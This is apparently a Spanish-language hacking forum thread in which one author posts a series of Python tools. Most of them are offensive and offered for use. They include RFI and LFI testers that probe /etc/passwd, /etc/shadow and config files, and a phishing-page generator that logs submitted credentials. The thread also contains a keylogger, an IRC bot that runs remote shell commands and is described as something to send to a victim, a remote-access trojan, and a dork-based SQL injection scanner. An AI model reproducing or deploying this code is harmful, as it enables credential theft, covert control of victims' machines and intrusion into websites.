Mensajes

Hola a todos.

Acabo de hacer un simple verificador de vulnerabilidad RFI

Código (python) [Seleccionar] Expandir


#!usr/bin/python
#RFI Tester (C) Doddy Hackman

import os,sys,urllib2,re

def header() :
print "\n--== RFI Tester ==--\n"

def copyright() :
print "\n\n(C) Doddy Hackman 2010\n"
exit(1)

def show() :
print "\n[*] Sintax : ",sys.argv[0]," <web>\n"

def toma(web) :
return urllib2.urlopen(web).read()

def test(web):
try:
 print "\n[+] Testing vulnerability RFI in",web
 code = toma(web+"http://www.supertangas.com")
 if(re.findall("Los mejores TANGAS de la red",code,re.I)):
  print "[+] RFI Detected"
 else:
  print "[-] RFI Not Found"
except:
 pass

header()

if len(sys.argv) != 2 :
show()

else :
test(sys.argv[1])

copyright()


#The End


Ejemplo de uso

Código [Seleccionar] Expandir


python rfi.py http://127.0.0.1/rfi.php?index=


Código [Seleccionar] Expandir


C:\Users\DoddyH\Desktop\Arsenal X parte 2>rfi.py http://127.0.0.1/rfi.php?index=

--== RFI Tester ==--


[+] Testing vulnerability RFI in http://127.0.0.1/rfi.php?index=
[+] RFI Detected

(C) Doddy Hackman 2010



Hola a todos

Acabo de terminar esta tool en python para generar los fakes o phising (si es que asi se escribe)
No me dedico mucho a esa parte del hacking , pero hice esta cosa rara porque no
tenia nada que hacer xDD.

Código (python) [Seleccionar] Expandir

#!usr/bin/python
#Phising Gen (C) Doddy Hackman

import urllib2,sys,os


def savefile(filename,text):
file = open(filename,"w")
file.write(text)
   

def header() :
print "\n\n--== Phising Gen ==--\n"

def copyright() :
print "\n\n(C) Doddy Hackman 2010\n"
exit(1)

def show() :
print "\n[*] Sintax : ",sys.argv[0]," <web> <filename>\n"

def toma(web) :
return urllib2.urlopen(web).read()


def gen(web,new):
try:
 print "\n[+] Working in the phishing"
 code = toma(web)
 text ='<?php $file = fopen("dump.txt", "a");foreach($_POST as $uno => $dos) {fwrite($file, $uno."=".$dos."\r\n");}foreach($_GET as $tres => $cuatro) {fwrite($file, $tres."=".$cuatro."\r\n");}fclose($file);?>'
 print "[+] The fake was save in",new
 savefile(new,code+"\n\n"+text)
except:
 pass

header()

if len(sys.argv) != 3 :
show()

else :
gen(sys.argv[1],sys.argv[2])

copyright()

#The End




Ejemplo de uso

Código [Seleccionar] Expandir


C:/Users/DoddyH/Desktop/Arsenal X parte 2>phising.py http://127.0.0.1/login.php
yeah.php



--== Phising Gen ==--


[+] Working in the phishing
[+] The fake was save in yeah.php


(C) Doddy Hackman 2010



Hola a todos.

Acabo de terminar una tool para testear una vulnerabilidad LFI , si la pagina
es vulnerable entonces el script automaticamente intenta brutear archivos.

Código (python) [Seleccionar] Expandir


#!usr/bin/perl
#LFI T00l (C) Doddy Hackman

import os,sys,urllib2,re

files = ['../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc']

def header() :
print "\n--== LFI T00l ==--\n"

def copyright() :
print "\n\n(C) Doddy Hackman 2010\n"
exit(1)

def show() :
print "\n[*] Sintax : ",sys.argv[0]," <web>\n"

def toma(web) :
return urllib2.urlopen(web).read()


def fuzz(web):
print "\n[+] Fuzzing files...\n"
for file in files:
 code = toma(web+file)
 if not (re.findall("No such file or directory in",code)):
  print "[File Found] : ",web,file
 


def test(web):
try:
 print "\n[+] Testing vulnerability LFI in",web
 code = toma(web+"'")
 if(re.findall("No such file or directory in <b>(.*?)<\/b> on line",code,re.I)):
  fpd = re.findall("No such file or directory in <b>(.*?)<\/b> on line",code,re.I)
  print "\n[+] LFI Detected"
  print "[+] Full Path discloure : ",fpd[0]
  fuzz(web)
 else:
  print "[-] LFI Not Found"
except:
 pass

header()

if len(sys.argv) != 2 :
show()

else :
test(sys.argv[1])

copyright()


#The End

Ejemplo de uso

Código [Seleccionar] Expandir


python lfi.py http://127.0.0.1/lfi.php?file=


Código [Seleccionar] Expandir


C:\Users\DoddyH\Desktop\Arsenal X parte 2>lfi.py http://127.0.0.1/lfi.php?file=

--== LFI T00l ==--


[+] Testing vulnerability LFI in http://127.0.0.1/lfi.php?file=

[+] LFI Detected
[+] Full Path discloure :  C:\xampp\htdocs\lfi.php

[+] Fuzzing files...



(C) Doddy Hackman 2010



Un simple keylogger en Python

Código (python) [Seleccionar] Expandir


#!usr/bin/python
#Simple Keylogger in Python
#(C) Doddy Hackman 2011

import pyHook,pythoncom


def savefile(name,text):
file = open(name,"a")
file.write(text+"\n")
file.close()

def toma(frase):
savefile("logs.txt",frase.Key)

def capturar():
nave = pyHook.HookManager()
nave.KeyDown = toma
nave.HookKeyboard()
pythoncom.PumpMessages()

while 1:
capturar()

# The End

Hola a todos.

Aca les traigo un IRC Bot en Python para poder usar como servidor oculto y mandarselo
a una victima para poder controlarla desde un comando canal IRC

El comando clave para mandar comandos que despues se muestra el
resultado de comando en el chat es

Código [Seleccionar] Expandir


cmdnow TUCOMANDO


Código (python) [Seleccionar] Expandir

#!usr/bin/python
#Insane Bot (C) Doddy Hackman 2011
#Version beta 0.00001

import re,socket
import subprocess

host = "127.0.0.1"
canal = "#locos"
nick = "bot"

irc = socket.socket()
try:
irc.connect((host,6667))
irc.send("NICK "+nick+"\r\n")
irc.send("USER "+nick+" 1 1 1 1\r\n")
irc.send("JOIN "+canal+"\r\n")
print "[+] Insane Bot Online\n"
while 1:
 code = irc.recv(9999)
 if re.findall("PING",code):
  irc.send("PONG "+code.split()[1]+"\r\n")
 if re.findall("PRIVMSG",code):
  nick = code.split("!")
  nick = nick[0].replace(":","")
  msg = code.split(":")[2:][0]
  if re.findall("cmdnow",code):
   cmd = code.split("cmdnow")[1]
   irc.send("PRIVMSG "+canal+" : [+] Loading command : "+cmd+"\n")
   rea = subprocess.Popen(cmd,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
   if rea:
    re1 = rea.stdout.read()
    total = re1.replace("\n","|")
    irc.send("PRIVMSG "+canal+" : "+total+"\n")
   else:
    re2 = rea.stderr.read()
    total = re2.replace("\n","|")
    irc.send("PRIVMSG "+canal+" : "+total+"\n")
   
 
except:
print "\n\n[-] Error\n\n"


# The End


Bueno , este es un simple programa en python hecho en tk que permite mandar
peticiones webs a un servidor en concreto

Código (python) [Seleccionar] Expandir

#!usr/bin/python
#Console (C) Doddy Hackman 2011

from Tkinter import *
import socket

global x,socket

def execa() :


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((str(host.get()),80))
s.send(cmd.get()+"\r\n")
data = s.recv(666)
s.close()
panel.insert(END,repr(data))

 

window = Tk()
window.title("HTTP Console (C) Doddy Hackman 2011")

window.maxsize(width="400",height="350")
window.minsize(width="400",height="350")

window.configure(background="black")
window.configure(cursor="tcross")

host = StringVar()
cmd = StringVar()

panel = Text(window,width=30,height=15,bg="black",fg="red")

Label(window,bg="black").grid(row=3)

Label(window,text="Host : ",bg="black",fg="red").grid(row=4,column=4)
entry = Entry(window,width=35,textvariable=host,bg="black",fg="red").grid(row=4,column=5)

Label(window,text="Command : ",bg="black",fg="red").grid(row=8,column=4)
entry = Entry(window,width=35,textvariable=cmd,bg="black",fg="red").grid(row=8,column=5)

Button(text="Cargar",bg="black",fg="red",activebackground="red",command=execa).grid(row=8,column=9)


Label(window,bg="black").grid(row=19)
panel.grid(row=20,column=5)


window.mainloop()


Hola , aca traigo un troyano en python con las siguientes
opciones

• Ocultar inicio
  
• Mostrar inicio
  
• Ocultar barra de tereas
  
• Mostrar barra de tareas
  
• Abrir CD
  
• Cerrar CD
  
• Ejecutar comandos
  
• Mostrar informacion
  
  server.py
  
  
  Código (python) [Seleccionar] Expandir
  
#!usr/bin/python
#Hell RAt (C) Doddy Hackman 2011

import socket,os,re,win32api,win32gui,win32con,ctypes,subprocess

print "\n\n[+] Online\n\n"

slave = socket.socket()
slave.bind(("",666))
slave.listen(999)

a,b = slave.accept()

while True:
rex = a.recv(20)
if re.findall("getso",rex):
 z = os.name
 a.send(z)
if re.findall("getpath",rex):
 h = os.getcwd()
 a.send(h)
if re.findall("ocultarinicio",rex):
 x = win32gui.FindWindow("Shell_TrayWnd","")
 win32gui.ShowWindow(x,win32con.SW_HIDE)
elif re.findall("mostrarinicio",rex):
 x = win32gui.FindWindow("Shell_TrayWnd","")
 win32gui.ShowWindow(x,win32con.SW_SHOWNORMAL)
elif re.findall("ocultaricono",rex):
 x = win32gui.FindWindow(0,"Program Manager")
 win32gui.ShowWindow(x,win32con.SW_HIDE)
elif re.findall("mostraricono",rex):
 x = win32gui.FindWindow(0,"Program Manager")
 win32gui.ShowWindow(x,win32con.SW_SHOWNORMAL)
elif re.findall("abrircd",rex):
 ctypes.windll.WINMM.mciSendStringW(u"set cdaudio door open", None, 0, None)
elif re.findall("cerrarcd",rex):
 ctypes.windll.WINMM.mciSendStringW(u"set cdaudio door closed", None, 0, None)
else:
 rea = subprocess.Popen(rex,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
 if re:
  a.send(rea.stdout.read())
 else:
  a.send(rea.stderr.read())


# The End  
  
  cliente.py
  
  
  Código (python) [Seleccionar] Expandir
  
#!usr/bin/python
#HellRat (C) Doddy Hackman 2011

import os,socket,sys

def head():
print "\n\n-- == hELLrAT == --\n\n"

def copyright():
print "\n\n(C) Doddy Hackman 2011\n\n"

def clean():
if sys.platform=="win32":
 os.system("cls")
else:
 os.system("clear")

def men():

try:
 ip = raw_input("[+] IP : ")
 client = socket.socket()
 client.connect((ip,666))
 while True:
  clean()
  print "\n\n[+] Welcome to ",ip,"\n\n"
  print "\n\n[1] Informacion"
  print "[2] CMD"
  print "[3] Abrir CD"
  print "[4] Cerrar CD"
  print "[5] Ocultar iconos"
  print "[6] Mostrar iconos"
  print "[7] Ocultar barra de tareas"
  print "[8] Mostrar barra de tareas"
  print "[9] Cambiar IP"
  print "[10] Salir"
  op = input("\n\n[Opcion] : ")
  if op == 1:
   print "\n\n[+] Informacion\n\n"
   client.send("getso")
   so = client.recv(999)
   client.send("getpath")
   path = client.recv(999)
   print "[+] SO : "+so  
   print "[+] Path : "+path
   raw_input()
  if op == 2:
   cmd = raw_input("\n[CMD] : ")
   client.send(cmd)
   code = client.recv(999)
   print code
   raw_input()
  if op == 3:
   client.send("abrircd")
  if op == 4:
   client.send("cerrarcd")
  if op == 5:
   client.send("ocultaricono")
  if op == 6:
   client.send("mostraricono")
  if op == 7:
   client.send("ocultarinicio")
  if op == 8:
   client.send("mostrarinicio")
  if op == 9:
   men()
  if op == 10:
   client.close()
   copyright()
   raw_input()
   sys.exit(1)
except:
 print "\n\n[-] Error\n\n"
head()
men()

# The End


Bueno , acabo de hacer un scanner de sqli.

Este busca en google paginas con un dork marcado por ustedes
, para despues borrar repetidos y scanear las webs encontradas

Código (python) [Seleccionar] Expandir

#!usr/bin/python
#Google Iny (C) Doddy Hackman 2011


import urllib2,re,os,sys


def head():
print "\n\n -- == Google Iny == --\n"

def copyright():
print "\n(C) Doddy Hackman 2011\n"
sys.exit(1)


def toma(web) :
nave = urllib2.Request(web)
nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
op = urllib2.build_opener()
return op.open(nave).read()


def show():
print "\n[+] Sintax : ",sys.argv[0]," <dork> <count>\n"

def limpiar(pag):

limpia = []
for p in pag:
 if not (re.findall("http://www.google.com.ar",p,re.I)):
  if p not in limpia:
   limpia.append(p)
return limpia


def sql(webs):
for web in webs :
 if re.findall("=",web):
  web = re.split("=",web)
  web = web[0]+"="
  try:
   code = toma(web+"-1+union+select+1--")
   if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
    print "[SQLI] : ",web,"\n"
  except:
   pass

def scan(dork,count):
pag = []
s = 10  
while s <= int(count):
 try:
  code = toma("http://www.google.com.ar/search?hl=&q="+str(dork)+"&start="+repr(s))
  d = re.findall("(?<=\"r\"><. href=\")[^\"]+",code)
  s += 10
  for a in d:
   pag.append(a)
 except:
  copyright()
pag = limpiar(pag)

return pag

head()

if len(sys.argv) != 3:
show()
else :
print "\n[+] SQL Scan Started\n"
print "[+] Dork : ",sys.argv[1]
print "[+] Count : ",sys.argv[2]
pages = scan(sys.argv[1],sys.argv[2])
print "\n[+] Webs Found : ",len(pages),"\n"
sql(pages)

copyright()


Hola a todos.

Aca les dejo un simple buscador de dns , solo ponen el dominio y esta cosita se encarga de buscarlas.

Código (python) [Seleccionar] Expandir

#!usr/bin/python
#LFI T00l (C) Doddy Hackman

import os,sys,urllib2,re

dns = ['www','www1','www2','www3','ftp','ns','mail','3com','aix','apache','back','bind','boreder','bsd','business','chains','cisco','content','corporate','cpv','dns','domino','dominoserver','download','e-mail','e-safe','email','esafe','external','extranet','firebox','firewall','front','fw','fw0','fwe','fw-1','firew','gate','gatekeeper','gateway','gauntlet','group','help','hop','hp','hpjet','hpux','http','https','hub','ibm','ids','info','inside','internal','internet','intranet','ipfw','irix','jet','list','lotus','lotusdomino','lotusnotes','lotusserver','mailfeed','mailgate','mailgateway','mailgroup','mailhost','maillist','mailpop','mailrelay','mimesweeper','ms','msproxy','mx','nameserver','news','newsdesk','newsfeed','newsgroup','newsroom','newsserver','nntp','notes','noteserver','notesserver','nt','outside','pix','pop','pop3','pophost','popmail','popserver','print','printer','private','proxy','proxyserver','public','qpop','raptor','read','redcreek','redhat','route','router','scanner','screen','screening','ecure','seek','smail','smap','smtp','smtpgateway','smtpgw','solaris','sonic','spool','squid','sun','sunos','suse','switch','transfer','trend','trendmicro','vlan','vpn','wall','web','webmail','webserver','webswitch','win2000','win2k','upload','file','fileserver','storage','backup','share','core','gw','wingate','main','noc','home','radius','security','access','dmz','domain','sql','mysql','mssql','postgres','db','database','imail','imap','exchange','sendmail','louts','test','logs','stage','staging','dev','devel','ppp','chat','irc','eng','admin','unix','linux','windows','apple','hp-ux','bigip','pc']

def header() :
print "\n--== Fuzz DNS ==--\n"

def copyright() :
print "\n\n(C) Doddy Hackman 2010\n"
exit(1)

def show() :
print "\n[*] Sintax : ",sys.argv[0]," <web>\n"

def toma(web) :
return urllib2.urlopen(web).read()


def search(web):
print "\n[+] Searching DNS in",web,"\n"
try:
 for d in dns:
  toma("http://"+d+"."+web)
  print "[DNS Link] : http://"+d+"."+web
except:
 pass

header()

if len(sys.argv) != 2 :
show()

else :
search(sys.argv[1])

copyright()


#The End


Ejemplo de uso

Código [Seleccionar] Expandir


C:/Users/dODDYh/Desktop/Arsenal X parte 2>fuzzdns.py google.com


--== Fuzz DNS ==--


[+] Searching DNS in google.com

[DNS Link] : http://www.google.com

(C) Doddy Hackman 2010



Hola

Aca traigo un simple cliente FTP

Código (python) [Seleccionar] Expandir


#!usr/bin/python
#FTP Manager 0.2 (C) Doddy Hackman 20111

from ftplib import FTP
import sys


def head():
print "\n -- == FTP Manger == --\n\n"

def copyright():
print "\n\n(C) Doddy Hackman 2011\n"
sys.exit(1)

def show():
print "\nSintax : "+sys.argv[0]+" <host> <user> <pass>\n"

def menu():
print "\n"
print "1 : dir"
print "2 : cwd"
print "3 : chdir"
print "4 : delete dir"
print "5 : delete file"
print "6 : rename file"
print "7 : make directory"
print "8 : size"
print "9 : abort\n\n"
op = input("[Option] : ")
return op


def enter(host,user,password):
print "[+] Connecting to ",host,"\n"
enter = FTP(host,user,password)
print "\n[+] Enter in the system\n"

def menu2():
 op = menu()
 if op == 1:
  try:
   lista = enter.dir()
   for a in lista:
    print a
   menu2()
  except:
   menu2()
 elif op == 2:
  try:
   print "\n\n[+] Path : "+enter.pwd()+"\n\n"
   menu2()
  except:
   menu2()
 elif op == 3:
  try:
   dir = raw_input("\n\n[Directory] : ")
   enter.cwd(dir)
   print "\n\n[+] Directory Changed\n\n"
   menu2()
  except:
   menu2()
 elif op == 4:
  try:
   dir = raw_input("\n\n[Directory] : ")
   enter.rmd(dir)
   print "\n\n[+] Directory Deleted\n\n"
   menu2()
  except:
   menu2()
 elif op == 5:
  try:
   file = raw_input("\n\n[File] : ")
   enter.delete(file)
   print "\n\n[+] File Deleted\n\n"
   menu2()
  except:
   menu2()
 elif op == 6:
  try:
   oldfile = raw_input("\n\n[Name] : ")
   newfile = raw_input("\n[New Name] : ")
   enter.rename(oldfile,newfile)
   print "\n\n[+] Name Changed\n\n"
   menu2()
  except:
   menu2()
 elif op == 7:
  try:
   dir = raw_input("\n\n[New Directory] : ")
   enter.mkd(dir)
   print "\n\n[+] Directory Created\n\n"
   menu2()
  except:
   menu2()
 elif op == 8:
  try:
   file = raw_input("\n\n[File] : ")
   peso = enter.size(file)
   print "\n\n[+] ",peso," KB \n\n"
   menu2()
  except:
   menu2()
 elif op == 9:
  enter.quit()
  copyright()
 
 else:
  menu2()      
menu2()



head()

if len(sys.argv) != 4:
show()
else:
enter(sys.argv[1],sys.argv[2],sys.argv[3])

copyright()